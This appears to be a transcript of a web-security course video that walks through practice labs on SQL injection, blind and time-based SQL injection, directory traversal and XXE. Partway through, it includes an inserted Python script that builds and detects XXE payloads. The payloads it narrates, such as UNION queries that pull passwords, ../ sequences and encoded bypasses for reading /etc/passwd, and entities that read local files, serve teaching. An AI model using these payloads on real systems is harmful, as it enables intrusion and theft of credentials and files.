actually going to use one we have to leave it with null so that way that column receives an input we just don't want anything from it yet at this point and then for Oracle the way you pull down a 
version is V dollar sign and then just the word version we'll see if that sends it for us I saw this change in the background to solve so that gets us our information that we need and so we should be able to scroll through here and we find it right right in here okay in this lesson we're going to go ahead and open up this one the MySQL and Microsoft I will just go ahead and tell you they are trying to pull a quick one on us because instead of using the typical dash dash right here that we use in Microsoft to close out or to cancel or to comment out everything after your query you use you will use a hashtag and that will snout me I will come across that and I can sometimes not figure out what's going on and I can spend a significant amount of time trying to figure it out and in the end I was using the wrong comment and so it's one thing to be aware of and in this lab we're going to inject an attack we're going to pull down the type of type and version of MySQL that's being used and so this is very very similar to the last one and when you go ahead and open up the lab we are looking to make the database retrieve the string so I'm actually not entirely sure how to get this to say solved so we're going to be figuring this out together for I guess the first time so I'm guessing what we're supposed to do is use our Union select attack pull down the response that we get right here and try and find the version which will look something like this that it's using and then go back and put it into a string and it should give us the solved problem solved up here so if you would like to go ahead and give this a try on your own you can go ahead and do that and I'll give you a few seconds and you can pause the video and then we'll walk through it together we're going to continue the same way we have been turn on the proxy pick a category send it to repeater turn the proxy off I'm going to lower this so when it comes through a solid we can see it we'll see if we get our error and 
we do try it for null and then don't forget the way we comment out is with the hash or the pound symbol has more than one column and it has two columns so what we will do is we will make sure they can both receive a string and they do and so the way we pull down the version in Microsoft MySQL is a little different than the way we did it with the Oracle one we'll go with the two at symbols you type in version and if you looked through the cheat sheet you would know this is how you pull down the version for Microsoft and so what we do is we type in null because you have to have both columns filled and then we'll send it we came back with a positive response and so we'll look and see if we can oh it solved it for us it already said solved I thought we were going to have to find a version number and send it through as a string right here okay at this point things are going to become progressively more difficult in pulling down usernames and passwords especially once we get to the blind find SQL injection because this is something that we have not seen before so we're going to be preparing for that by going into this lab right here you can go ahead and open it up and we are going to be pulling down the username and passwords and we're going to log in as the administrator to solve this challenge I think you can go ahead if you want and practice pulling down how many columns there are and which ones actually receive a string and you can go ahead and pause and do that if you would like if not we're going to go ahead and solve it together so we'll turn on the Interceptor and we're going to be seeing some new information that we haven't seen before it's going to seem strange but I'm going to do my best to explain exactly how the SQL statements work default tables and what we're looking for so we'll go ahead send that to repeater turn that off send that let's make sure we get our error determine how many columns there are string and they do so at this point things are going 
to be a little bit different than what we've been doing we're actually going to be trying to pull down some information from these tables and so what we do the first thing we have to do is figure out the table name so if we have a grid like an Excel sheet you have your columns that are going up and down your rows that are going across and the name of the table the first thing we have to know is the table name in order to request the columns and then individual cells within the table for us to pull down they contain the usernames and the passwords so we have our Union select and then we come in and we type in table name and so this is what we're looking for if you remember we're replacing one of the null values with the table name then we leave the second one with the null value because we're not going to be pulling anything from it just yet and then we go from the information schema and this right here the information schema dot tables and this is a default table that you're going to have on every SQL database so that's how I know this is there if you were to go into SQL and you were to open it up you're going to have several default tables the information schema tables this is default it's always going to be there and so this is how we know what to put in for our injection then we send it and we have an error which means I'm guessing I have a typo schema there was my typo and we pulled down and we'll look through our response and see the pull down the table names that we have here and there are a bunch of table names but if you remember the one we're looking for we're trying to log in as the administrator so we're going to need the users table right here users this is the name of users table I would suggest copying it and having a text file open because we're going to need this information so now we're going to look for the column name so we can delete this so the table column is what we're looking for now so we're going to actually I deleted the wrong part of the 
request set of the table we're looking for the column name and we're going to leave this and the information schema Dot columns and this looks right and now we're going to add to this because now we're looking for the columns from a very specific table so now we add a plus and we'll say where the table name equals and then our users table that we just pulled down so we'll type in table name and then we do equals and then our double quotes I think I've actually already got that copied still and then we paste in our users table so what we have going on is our Union select so everything that's coming before this doesn't really matter we're adding a query onto it we're looking for the column name we have our second value retrieving null because we're not looking for anything from it just yet from the information schema which is one of the defaults within the SQL database and where we found the table so now we're looking for columns where the table name so we're pulling down the table name equals users this is going to give us the columns within the table that is named users with some random characters and so we should be able to send this so now we should be able to scroll down and we have column names so the passwords column and the users column and so now we should be able to change our query and pull down the passwords and the username so I'm going to go ahead and copy these we have the username and the password columns these are the ones that we are interested in and now we're going to change our Union statement so now instead of pulling down a column name we are going to be looking for the username and the password so we can delete our null and we can insert the password column and here we'll put in the username column in the first slot instead of the column name and we're looking for the username the password from users let's see if that works for us and it does so we should be able to come through now to solve the challenge we have the administrator and another 
user so we can copy the administrator we can come back to our lab remember to solve it we have to log in as the administrator we can paste in the administrator and then we can come back to burp and copy our password and this should solve the challenge for us okay now that was very I don't want to say complicated but it was a big jump from where we have been coming and where we've been coming from and so as we get ready to go into blind SQL injections it's going to become even more complicated so you might have to go through this lab several times and make sure that you really understand what's happening make sure that everything that's built up to this point is working together the next Lab I believe is an oracle lab okay so you can try and solve this one it's going to be similar to the one that we just did only can use the SQL cheat sheet we'll go ahead and walk through it again just so we can have one more practice before we get into the blind SQL injections because these are going to use everything we just learned in this lesson plus quite a bit more we're going to be looking at new aspects within burp and exactly how to use the Intruder tool within the program so I think it's very important at this point if I can stress it enough we're going to have quite a bit of practice going into the blind SQL injection but it's a lot more difficult than what we just went through if you've never done this before so go through this again if you have to make sure you understand what's happening and what's going on I want you to try and solve this lab completely on your own I'm going to give you two Clues before you start but other than that you have already learned everything necessary for solving this challenge we'll go ahead and open up the lab and if you remember when we you do go through an Oracle database you have to use from Dual when you're trying to pull down the number of columns when it within the table and so since we're looking for for the we're going to have to 
log in as the administrator that should give you a clue to at least how many columns are going to be within the table and so the other clue I wanted to give you is if you go ahead and open up the SQL injection cheat sheet when you pull this open you are going to be using from all tables instead of information schema so in the last lesson we used information schema as our default well that's not what we're going to be using this time this time we're going to use all tables everything should be the same as it was last time the only difference is we're going to be using all tables instead of information schema and so you can go ahead with that information and try and solve this lab and if you have gotten stuck we're going to go ahead and walk through this together now so the first thing is turn your Interceptor on we're going to go through the normal procedures here or send it to repeater Turn The Intercept off and make sure that we have our air up here which we do so this is telling us we have a SQL injection we are going to pull down the number of columns I know there's at least two because we were told that we have to log in as the administrator which means there's at least a user's name a username and passwords column so we have at least two of those and then we'll go ahead and send this and it comes back so there are two columns both of these are going to have to retrieve a string in order for us to pull down a username and password so I'll go ahead and check it anyway but I know it's going to come through and it does now this is where we're going to start practicing what we learned in the previous video so if you remember the first thing we have to do is find the table name so we can go ahead and type in our table name and this is from last time we used information schema but if you remember this time we're going to use all tables and there we go so this should give us all tables if you remember last time there was a bunch of them but we are looking for the 
users I'm guessing this is the one that we need history we're gonna go ahead and pull down the information well this is uh we'll grab a couple of them just in case but I think that's going to be the right one so we'll keep this one this is the one we're gonna roll with now what we'll do is we'll have to come back up here if you remember and change now that we have the table name we're going to go ahead and insert this and see if we can find the column name so we'll change this to column and we'll leave our null and it is from and this time we're going to and put in our table into our injection so we have from from all of our tables and we're looking for at this point the columns where it is equal the table is equal to the table name that we just pulled down so we have where and then we'll type in our table name and then equals our table name and we'll go ahead look this over and then we'll send it and it came through now we have to hope that we have our columns so we have a password column pull down and we have the username okay now we have to change our injection one more time so we will this time we'll be getting rid of our null value and we're going to be putting in first our username and then we're also looking for the passwords which will come from our second column and this is going to come from our table name which I actually think we delete this we'll delete that and we'll delete this and we have an error comma and we have pulled it down so this should have our usernames and our passwords in it just like the last one that we walked through here's the administrator and the password and so if you remember we have to log in to actually receive the solved lab up here so we'll go ahead paste that we'll copy and paste this and send it and we have solve the challenge and we are ready to start the blind SQL injection we are going to go ahead and open up this lab while it's loading I thought I would just tell you this is going to be the next couple of labs are going 
to be a little more difficult, and I think that you should practice them just to get this ingrained into your mind, what exactly is happening, because we're going to be adding quite a few new steps. But they actually let us skip what we have been practicing, because in the instructions they give us that we are going to be working with a table called users and two columns, the username and password. So we don't have to go find the table and we don't have to find the columns, but we do still have to log in as the administrator to complete this lab. So you can go ahead and open up this lab, start this lab exactly how we normally would by opening up one of these tabs, forwarding it, and then sending our request to the Repeater, because what you're looking for is a request with this tracking ID. You need that tracking ID because that's where the SQL injection is going to be. So we'll send this, and you can send it a few times, and what I'm looking for is this content length; I want to make sure that it does not change. And sometimes you will send this on some web applications and it will change every time no matter what you do, the exact same GET request, but for us, in our case it stays the same, which makes this lab much easier to solve. And when you have this tracking ID you can also check it as well for the SQL injection. And so you send it, and you can see the content length has changed, so it's 49.06, and you send it and now it has changed. This tells us there is a possibility of a SQL injection. So what we're looking for is what has actually changed in our response here. What I like to do when I come across a different response is to copy this and take it to a text editor; I think it's easier to read through and to look at, and I also can search, which we are going to do right here. So when it comes back without any modifications we have the... let's send this again, we have the "Welcome back" on the page. When we put in our single quote to try and provoke an error, the "Welcome back" is gone, so you can see we have zero matches right here.

So with our zero matches we want to send a true statement to make sure that we can really add on to this query, so we go OR 1=1 and then comment this out. That comes back as true, so we know that we can give some kind of request and see what comes back true; what is actually true and is on the database will come back with this "Welcome back", which is what we're going to have to pay attention to. And so because we've already been told what the table name is and the column names, we can go ahead and start to look for information from this table. So we'll type in our usual UNION SELECT, and this is where it changes, because we're going to now add a character into our query. So we're going UNION SELECT, FROM, and then we're going to go to our users table, WHERE the username is equal to, and then remember we were told we need to log in as administrator, so that's the username we're looking for. And we are going to send this and see if it comes back as true, and it does. So we have this, and now what we can do is we can actually add on to it and we can look for the length of the password. And so you can come in here and you can look to see how long the password is, and you can pull down the length of the password: you can come in here and you can go plus, AND, plus, LENGTH, and then we add in the password, and then you would add, is it greater than, and then you can start right here and you can start sending to see, is it greater than 1, is it greater than 2, is it greater than 3. And you can send this to the Burp Repeater and just continue seeing is it greater than, and looking through this. What I am going to do is I'm actually going to skip this process for the sake of time, because we're going to have to go into Burp Intruder and start looking for the actual password. So what we're going to do is we're going to send this query over to the Intruder and see what we can pull back.

So I'm going to go ahead and take this query here, and what we're going to do is we're going to take this and we're going to add into it the characters that we're looking for. And so you would add in that you're looking for the first character, and only one character, inside the query, and then you're going to start with the character a. Now at this point I'm sure this is the first time you've ever seen anything like this; it looks very strange, and it is going to feel really strange doing things like this. It's new and it's kind of confusing. So we'll send this, not to Repeater, to Intruder. And so we have this new string that we're sending: so we have our normal UNION SELECT, and then we have a string FROM users WHERE the username equals administrator. So we're looking on the table named users, under the column username, for the administrator's password, and we are looking for the actual password at this point. And this actually, I just noticed, we're not looking for the length of the password, we're going to be looking for the substring. So we'll come over to Intruder, we'll look at our positions, because we've already sent this over here. We'll clear where it wants us to start querying, and we are looking for the substring in the password, and so we will go ahead and set this up. What we do at this point is, as we set up our payload, you will add whatever those symbols are to tell it this is where we want to shoot through, and we're going to use the cluster bomb. So this is where we're going to be going through and sorting to make sure we have the right characters, and then we'll add right here, because if you remember this selects the first character, and then it's going to go through the first character for all the characters that we give it, but then we want it to go through the second character as well, and the third and the fourth and the fifth, until we reach the end and we have the password. I don't have the professional version of Burp on this system, and so this is actually going to go really slow, and once it starts I'm going to go ahead and pause the video so you don't have to wait for it to pull down the password, because it will actually take a while without the professional version of Burp.

And so what we're going to do now is we're going to set up our payloads. And so if you remember, payload one is going to go to this position and payload two is going to go to this position. So the first payload, we're going through numbers, so we will find numbers, and we're going to go from one, and, this is when I guess it would have been helpful... I'm just going to go really far. This is when it would have been helpful to see how many characters were in the password, so you would have known how far you needed to go. And then we're going to go by a step of one, so it's going to go up one character once it goes through all 30 characters. And then position two, we are going to be going through the alphabet. See if it has the alphabet in here for us; I believe it does. Manually add these in; it would be a lot easier to go through these without having to do this, but I will edit this out. All right, I believe we have all of the characters added in. What we can do is we can go ahead and start the attack and we can say okay, and now it is going to go through and start working through all of those characters. So position one and a, position two and a, position three and a, and it's going to go through and check every character for each position until one returns true.

Okay, I have gone ahead and cut the video in the middle of where we were after starting the attack, and you can see that it's been running and we've pulled down some of the characters that we've needed. One of the things that might be helpful: if you copied exactly what I had typed in into the payload, or into the query right here, I actually had an error and I had to go through and change that and fix it. And then that ran for a little while, and then also my computer fell asleep while running this and it closed out my query, and so I had to restart it. And so this has been running for what feels like forever, and so I'm going to go ahead and we're going to stop it here, and I'm going to show you a little more manual way, and it's also a lot faster. Because if you can see, it's sending one query each time to the server and it's very slow, anywhere from 10 to 15 seconds, and it's because we've sent so many. And this is one of the things Burp does in order to get you to buy Burp Professional, so that it'll send them really fast; so they've throttled this down. But I'm going to show you a way that you can kind of get around this and send your queries a lot faster.

Before we start that, I kind of wanted to show you our positions just in case it wasn't clear. Remember, in our query we are selecting from the table users, where the username is just the column, and we're looking for the name of administrator inside the password column. And so we're sending, this is the first character in the query, so this would be position number one, and then it'll change, it'll go position number two, and then position number three, and it will send a all the way through however many we set those positions, one, two, three, four, five, six, to see if an a comes back as true in any of those cases. And if it comes back true we'll see something like this: you can see the length has changed and the "Welcome back" is present in the response. And then once it goes through all of position one for all of the alphabet, it will go to b, and then it will start over, and it will continue and it'll go through like that. This is a very automated way; we don't have to really do anything, we just set it up and let it run, but if you don't have Burp Professional this can take a very long time.

And one thing before we go ahead and I show you how to organize this to find the password is that in order to get this "Welcome back" to show up, what you do is you can check in your response, and you can have your welcome down here, and if you can see these, it matches, the welcome has come back, which means it's true and we have a match. For these down here it is not true and there is no match. And so we can sort out the true characters that exist and in which position they exist: so there's a g in position two, there's a g in position 15, we have a k in position eight, and so on. And so we can know this is where there's characters in this, this is how it's true. But in order to get this welcome up here you have to go into your options. You will come down, so it'll start you up here, you'll scroll down to Grep - Match, it will clear what's in here, and you will add welcome. You'll get a little pop-up, you'll just click OK, and then it will bring you back to your results and it will look like this. And what you do is you just click this, and you click it again until we have the arrow facing down, and it will have all of the characters there for you as it runs.

Now the way I like to sort out the password is to have a text file open, which is right here. We have our text file, we'll delete this and we'll delete this, and we'll paste this in. So what we have here, we'll also delete these, because these are just our query numbers on how many GET requests were sent to the server, and I think the fewer numbers we have the easier this will be to understand. So this, if you remember, let's open this back up and have our text file: this is the position from payload number one, and this is the character that has come back in payload number two. So what you would do, so let's say this is what we've brought back and the query is finished, even though we know it's still running and it's going to take five more hours for it to finish running, so what we'd do is we'd have our password equals, and you'd come here and you'd go, okay, position number one is i, and then we'd look for two, two is o, position number three is a k, and then position number four is an i, and position number five l, and position six is a g, and then you'd go along and you would just continue doing this all
the way through so we get six and then we go seven and then eight is a c nine is in and by the time you've gone through all of this this is your password and so we were told that the username is administrator and the password is what we're pulling down right here and we'd come over here we'd go to our lab and this is where we would come in we'd click login you would use administrator and then this password that we have just pulled down so if you want to let your Intruder run for ever because it is really slow especially once you get past about position um after you get past request number 30 to 35 it really slows down so I'm going to go ahead and close this out okay we are going to look at the blind SQL injection with time delays so what you'll do is if you find what you believe to be a SQL injection you will inject a time delay and they're pretty simple but I also want to look at the cheat sheet because they're going to be different and we're only going to be looking at this one right here the blind SQL injection with time delays is really simple simple to the one with conditional responses which we just looked at the only difference is you would be running a case and then a statement which if you're a programmer it's like if then and uh you're you're going to be saying if this is true then sleep and rather than if this is true so with the cheat sheet these are all going to be different so you'll have to run this to get your program to sleep you'll for your delay with Microsoft it's going to be like your syntax is going to look like this for postgres ql is going to look like this and MySQL is going to look like this and so each one is going to be a little different and you might have to just try each one and see what comes back for you okay so this is we're going to have to to solve the lab we need it to sleep for 10 seconds which is kind of a long wait but 10 seconds feels like forever when you're waiting for a response and get to a get request so we will go 
ahead and turn intercept on, open this up, I think I clicked in the wrong spot, oh, there's a tracking ID, we have one right there. Let's see, it says it's blind, so it's not going to show anything for us. I'm actually going to go ahead and go to an item so that I know I'm in the right spot; you guys don't have to watch me fumble around like you are right now. We'll go ahead and send that to Repeater. The SQL injection that we're looking for with the time delay is the PostgreSQL one right here, so we'll use this syntax, the pg_sleep(10), and we're going to have to concatenate it to our query, which is just two pipes, the key just above your Enter key, or your Return key if you're on a Mac. Then you just type in the syntax exactly like you just saw, and don't forget to comment out the rest, and that should take 10 seconds for our response to come back. Once that response comes back we should have a Solved up here. So the time delays are really simple and really easy to run, and this is how you do it. I'm not sure why it didn't come back as solved; maybe we have to go ahead and forward this. There it is, there's the Solved. So they're really simple to run, they're a really easy proof of concept; you can change this to five seconds if you're impatient like I am and wait just five seconds instead of 10, but you have to do 10 here to solve the lab.

Okay, we are ready to start directory traversal. We have talked about this just a little bit earlier when we talked about navigating through files, going through directories such as this: we would cd into the Desktop and it changes us into that directory, and so we're able to go between directories and into different files. The way we go backward, if you remember, if I wanted to go back to my home I would just go back one directory and that takes me back. A good way to practice this, and maybe you've done this earlier, is to
open up your home folder, and up here in your little search bar you can practice going backwards or going forwards. So we'll just be going forwards like this, and then we can go forward again, into our Desktop, and then if we wanted to go back we would just do two dots and a slash. In directory traversal we will be going through files only in our browser, going backward through here, and we talked about this a little bit in the previous lessons. So we're going to go ahead and open up PortSwigger and our labs, and you can scroll down until you find directory traversal. We're going to walk through a few of these manually, and then I'm going to show you a tool that does this for you, and I will pull up a directory traversal that was found on HackerOne just so you can see that these are not something that's lost out there and somebody's found them all. Actually, recently, I would say within the last two years, someone found a bunch of directory traversals where they were able to pull down files that they should never have had access to on the Department of Defense. If you would think of any organization that's going to have good security you would think it would be the DoD, and these were found within the last two years on the DoD. So they're out there and they happen; I've actually found a few of them. I will go through them manually and then I'll show you an easy way to fuzz through with a tool that will actually pull down and tell you where a web application is vulnerable and exactly which payload it used to prove it's vulnerable. We'll do that after we go through some of these manually.

Okay, we are ready to open up our first lab, and you're going to be able to see just how easy these are to find manually. I think they're really simple, and anyone can go and try these knowing very
little about how the web application or locating files works in general; you can pretty much find these straight off your very first day. So we'll go ahead and access the lab and turn it on, and while that's opening, there are a few different ways to look for these. Probably the most common is going to be up here in your address bar; you'll come up here and this is where you'll search for them. I'll show you what you would do: you'd pull this open, hit your slash, go dot dot slash, dot dot slash, and then hit Enter and see if it can take you back to any files. But it is not going to work for us in this bar; we're actually going to have to use Burp for this. So we'll go ahead and turn our intercept on and click View details. I'm going to send a few of these requests to Repeater because I'm not actually sure where exactly we're going to find the traversal, so we'll send that to Repeater as well, and I think that's it. So we'll go ahead and open this, and if you remember how to go backward in our files, we'll actually start with the first one we sent. We'll delete this, so we're looking at the product ID, and you would go ../../ and then what we're looking for, if you remember from the lab description, is the /etc/passwd file, so we just type in etc/passwd and send it, and it says we get a bad request. So we'll go a couple more and see what happens. Okay, so we're still getting a bad request. What we'll do is go over to our other GET request and do the same thing. I like to start out just like this and then add to the path traversal as we go, so I go just like this and see how far we have to go before we can actually find the file, in this case before we solve the lab. Okay, so there, it solved it. So it goes back to the root folder and then it goes
forward into this directory and then forward into the passwd file, and it pulls down for us information that we should not be able to have access to, and for us this solves the lab. So each one of these ../ goes back one directory, and it goes back until it hits the root folder, and then it'll go forward into this directory and into this file, and that will give us information that we should not otherwise have access to.

Okay, we are ready to solve our second lab on path traversal. I think with what you have learned so far in the very first lab you should be able to solve the second lab on directory traversal, so if you want to go ahead and give it a try, open up the lab, which I've already done, and you will be looking for the same file we were looking for last time, the /etc/passwd file, and that will solve the lab for you. You can pause the video now and see if you can solve this challenge.

Okay, how did that go? Hopefully you were able to solve it without any trouble; if not, we're going to walk through it now. We'll turn on our intercept and click one of the View details, just to make sure we pull down the same GET request we had last time, which was not the product ID, it was the image filename. Send that to Repeater, and over here we're going to start out the same way we did last time: we come in here and start with our etc/passwd, and then as necessary we'll add in the ../ sequences, but we always start at the beginning and go backward if necessary. So we'll send this, and it came back on the first try. Hopefully you were able to solve that challenge, because they're going to get a little more challenging to do manually, but not all that difficult for us.

Okay, we are ready for the third challenge that we are going to be looking at for path
traversal, and in this one we're actually told what's happening. Go ahead and open up this lab and we'll see our instructions: we're told that the traversal sequence is stripped non-recursively, so what we will have to do is modify the attack just a little bit. Pretty regularly, especially with cross-site scripting, you will see developers who know of a way, or maybe a few ways, that an attack can be performed, and they'll just strip out specific elements or sequences within an attack or a payload so that they won't go through; but there's almost always another way to pull this off. In this lesson and the next one we're going to be able to observe just how you change payloads, and really, in bug bounty hunting, what you're going to be doing is a lot of trial and error until something works. So we'll open up this lab, and once you're in here you will click View details after you've turned on your intercept. We'll turn that on (my son would think this is the coolest toy ever), view the details, get the GET request that we need right here, send it to Repeater, and turn intercept off. Once we're in here we can start out with etc/passwd and send this, and it comes back with a bad request. You can try going back, and it comes back with a bad request again, and I actually know what is going on, because we're told that the traversal sequence is stripped. So we'll have to try something different: what you can do is use four dots with two slashes, `....//`, and then this is going to be a different process in pulling down the /etc/passwd file. We'll send this, and then one, two, three, four, we continue going, and we are able to find the file we need. Now, when it comes to remembering all of these different ways that you can try to find a directory traversal, it is not necessary to try to remember
these. I'm going to show you a tool that actually does all of this for you, with hundreds and hundreds of different ways to pull down an /etc/passwd file. I'm just showing you manually how this works so that you know what's going on and how to find these, just in case you're not allowed to run a scanning tool or anything like that on a specific web application. But you do not need to try to remember all of these different ways to pull down the /etc/passwd file, because you will have sources available that can do it for you, or remind you exactly how to pull off these attacks.

Okay, we are going to be working through our final path traversal before we look at how to do this with the automated tool. Go ahead and open up this lab, and in here we can read our instructions and exactly how to pull this off. We're told that this has URL decoding in it, and this is actually very similar to an exploit that was pulled off; I came across this not too long ago when I was looking through path traversals and how they were pulled off on the Hacktivity. This was done June 9th, 2018, so quite a while ago, a couple of years, but this is going to be pretty much the exact same exploit we're going to be doing in this lab, just to show you that these labs aren't just theoretical but they actually do help you perform these exploits. You can see here this is the URL encoding, and a simple way to look at URL encoding is to come over here to the Decoder, type in some gibberish, and encode it as URL, and you will see the URL encoding down here. What we are going to be doing is something very similar to what this guy has done here, and you can actually see he pulls down the file that he should not have access to. So what we are going to do is come in here, open up the lab, click Access the lab same as we've been doing the last few lessons, open up Burp, turn on the intercept, and
we will view details of one of the files. We will look for the GET request with the image filename, send it to Repeater, and now what we're going to do is very similar to what we just saw. We'll start out just like normal, you can send this, and then we are going to type in the URL-encoded version, because it's going to decode it for us, which is %252f, and that should pull it down for us. We'll delete that, because it's encoded in there, and we can send that. Rather than type this, I'm going to copy it, paste it and send, paste it and send, and there, we found the file. So you can really easily see how this is very practical: we're practicing it here, and someone actually pulled it off on a live website. If we come in here and turn our proxy off, we should solve the lab. In the next lesson you are going to be required to open up Juice Shop, because this is the URL we're going to be using to run the automated tool against, so you can go ahead and open up Juice Shop and get it running.

Okay, we are going to be looking at the automated way to find directory traversal exploits. Go ahead and open up a terminal and have Juice Shop open and running. To make sure you have the tool installed, you can come down to your terminal and type in `sudo apt-get install dotdotpwn`; it should look exactly like this. Hit Enter, it will require your password, type that in and it will run; it might ask you "are you sure you want to install", and you can press y and hit Enter, or Return if you're on a Mac, and it will install. The way to run this tool is very simple: you would just type in `dotdotpwn` and then give it the parameters that we want it to follow. So we'll type in `dotdotpwn` and then `-m`; I actually already ran it, just to make sure it would run on
our local server. So this is what you will type in: the `-m` flag with `http`, and then the `-h` flag with our localhost, and I actually just came up here and copied and pasted the page I was on. When you hit Enter it will run for us. Oh, it did not run for us because we have to run it with sudo, as our superuser; now it is running, and it'll ask us to press Enter to start the testing, so we'll hit Enter. Now you can see it is running all of those for us, with the ../../ and then it encodes it, and it just runs through and tells us even where it's vulnerable. Now, this web application is vulnerable, I think, to all of them; they did not do a good job of making the web application secure against this attack. It will run, and there are hundreds of different ways to send it; there's the one we just saw with the %252f, and it runs it for you and tells you. For us it would have been right here: we would have had three paths to go back before it goes forward into /etc/passwd, so it would have found it right here and flagged it as vulnerable. So now you can see just how easy it is to run this with this tool. You can hit Command-C to close out of it so that it'll stop running, and it might have actually gone ahead and solved a challenge for you. If it didn't, you can type in `../../../`, really any of these, because it says it's vulnerable to them, and then `etc/passwd`, and it should pull down (I think I already solved the challenge) that we have accessed a file that you should not have had access to, and that will solve that challenge for you. It's pretty simple; running this tool is really easy, and it takes a whole lot of the manual testing that we just did out of the picture for us, and it will run hundreds of different ways to find a path traversal. Okay, we're going
to start by looking at XML injection. At this point we're going to start with a really easy XML injection; this is the one you're going to see that's probably the most common, and from here we're going to look at some more uncommon XML injection methods, but they're going to be a lot more severe. This first one is really simple. Go ahead and open up this lab on PortSwigger right here; we'll click Access the lab, and I want to walk you through what is happening. When we look at this XML injection I want to focus just on these two lines. When you see this xxe right here, we can change this to be anything we want, and we see it down here, it is the same thing: this is the xxe entity being called, telling the XML file that we want it to do something right here, so we're going to tell the system to open up the /etc/passwd file. I will show you what this looks like. When you come up here and click View details, we will need to turn on Burp and forward this to Repeater, and we can now turn intercept off. We're going to need this right here, so we can copy it and paste it in right here at the top, and now we're going to delete this first part right here. We'll leave our DOCTYPE as foo, and we're going to change this right here to etc and this right here to passwd. Then down here, where it says the product ID, we want to call this entity to tell the system we want it to do something. If you remember what this looked like over here, we have the ampersand, xxe, and the semicolon; we copy that, and where that product ID was we paste it in. Now we'll send it and see if we have any errors, and we do not; it provides for us the /etc/passwd file. This is a pretty big vulnerability. This is something you shouldn't be able to look at, and it will give us the users that are on the system.
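The lab above makes the two edits by hand in Repeater: a DOCTYPE that declares an external entity, and an `&xxe;` reference in place of the product ID. The Python script below is an added example, not part of the course, that makes the same edit programmatically and adds two checks a practitioner wants: a request-side regex for external entity declarations (the signature an input filter or WAF keys on), and a parse with Python's standard `xml.etree`, which does not resolve external entities, to show that a back end whose parser behaves that way simply errors instead of leaking the file. `SAMPLE_BODY` is a constructed stock-check request shaped like the lab's, and the `productId` element, the `xxe` entity name and the `/var/www/html/db.php` path are assumptions; `php_filter_target` builds the `php://filter` wrapper target that the Hack The Box part of this lesson uses later to read PHP source.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of the stock-check body Burp captures in the lab
# (shape assumed; the real lab body may differ in element names).
SAMPLE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)

DEFAULT_TARGET = "file:///etc/passwd"


def php_filter_target(path):
    """Target URI using the php://filter wrapper: the server returns the file
    base64-encoded, so PHP source such as db.php is neither executed nor
    broken up by characters the XML parser would reject."""
    return "php://filter/convert.base64-encode/resource=" + path


def build_xxe_payload(body, target=DEFAULT_TARGET, element="productId", entity="xxe"):
    """Return `body` with an internal DTD declaring an external general entity
    that points at `target`, and the text of <element> replaced by a reference
    to that entity (the two lines the video edits by hand).

    The XML declaration, if present, stays first: a DOCTYPE placed before
    <?xml ...?> is a well-formedness error and the server would reject it."""
    doctype = '<!DOCTYPE foo [<!ENTITY %s SYSTEM "%s">]>' % (entity, target)
    decl = re.match(r"\s*<\?xml[^>]*\?>", body)
    head, rest = (body[: decl.end()], body[decl.end():]) if decl else ("", body)
    pattern = r"<%s>.*?</%s>" % (re.escape(element), re.escape(element))
    if not re.search(pattern, rest, flags=re.S):
        raise ValueError("no <%s> element to inject into" % element)
    rest = re.sub(pattern, "<%s>&%s;</%s>" % (element, entity, element),
                  rest, count=1, flags=re.S)
    return head + doctype + rest


# Any SYSTEM/PUBLIC entity declaration (general or parameter) in the request
# is the signature an input filter or WAF would look for.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.I)


def declares_external_entity(body):
    """True if the body declares an external entity; False for the benign body."""
    return EXTERNAL_ENTITY_RE.search(body) is not None


def stdlib_parser_result(body):
    """Parse with Python's xml.etree, which never fetches external entities:
    the reference &xxe; is reported as an undefined entity and parsing fails.
    Returns the productId text on success, None on ParseError. A target that
    behaves like this is not exploitable by this payload; the lab's back end,
    which expands the entity and echoes it in the response, is."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("productId")
    return node.text if node is not None else ""


if __name__ == "__main__":
    payload = build_xxe_payload(SAMPLE_BODY)
    print(payload)
    print("external entity declared:", declares_external_entity(payload))
    print("stdlib parse result:", stdlib_parser_result(payload))
    # Same edit with the php://filter wrapper used later against db.php
    # (path assumed for the example).
    print(build_xxe_payload(SAMPLE_BODY, php_filter_target("/var/www/html/db.php")))
```

Run it with `python3` and paste the printed payload into Repeater in place of the captured body. The `stdlib_parser_result` check is the caveat: an error response is not the same as a negative, since a non-resolving parser and a resolving parser that failed to read the file both error; look for the file contents, or a time or out-of-band signal, before calling a target not vulnerable.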
From here, we're going to move on to TryHackMe. We have a Juice Shop there, which is a really great place to practice a lot of web application vulnerabilities, and we will hop over, pop open a machine, and I'll show you a file upload XML injection. We'll come over to OWASP Juice Shop; you will need to click on Login and create an account, so I'm going to create an account, and then we'll be back at the home page, and I'll show you where to start from there.

Okay, so we are all logged in and we are now at the front page. We'll come up here to the three lines and say we want to file a complaint, and we'll just type a bunch of gibberish, and now we're going to need to upload a file. We will create our XML file by coming over here to gedit, and this is what we'll name our file so we know what it is; I'm going to make this on my Desktop so that it's easy to find. Now we need our code to inject with, so we'll copy this, move it over to our file, and then we'll just change this to etc/passwd, save it, close it, and come back over to Juice Shop and click Browse. We go to our Desktop, we want All files, xxe, Open. We need Burp to intercept this, so we'll come back to our proxy intercept and Submit; send this to Repeater. I actually don't remember which one this is, so we're going to send a couple of them; we'll send these and then just turn intercept off and hope we got it. It says we've solved several of the challenges. We'll come to Repeater, go back here to the first one, and send it, and right here is the passwd file. It doesn't come back in quite as nice a format as our original one that we had done on PortSwigger, but we have the XML injection working and we have the passwd file, and here's the root user. So this is a file upload XML injection.

Now we're going to cover an XML injection that's going to lead us to remote code execution, and you can actually see right here they tell us: remote code execution, if we are lucky
and the PHP expect module is loaded, we can get remote code execution. We're going to go ahead and try this, but this is on Hack The Box, and if you don't have a subscription to Hack The Box that's okay; this would be something I have never seen outside of Hack The Box, but it's something to be aware of. So I'll open up Hack The Box, launch the box, get all set up, and then I'll walk you through an XML injection with Hack The Box.

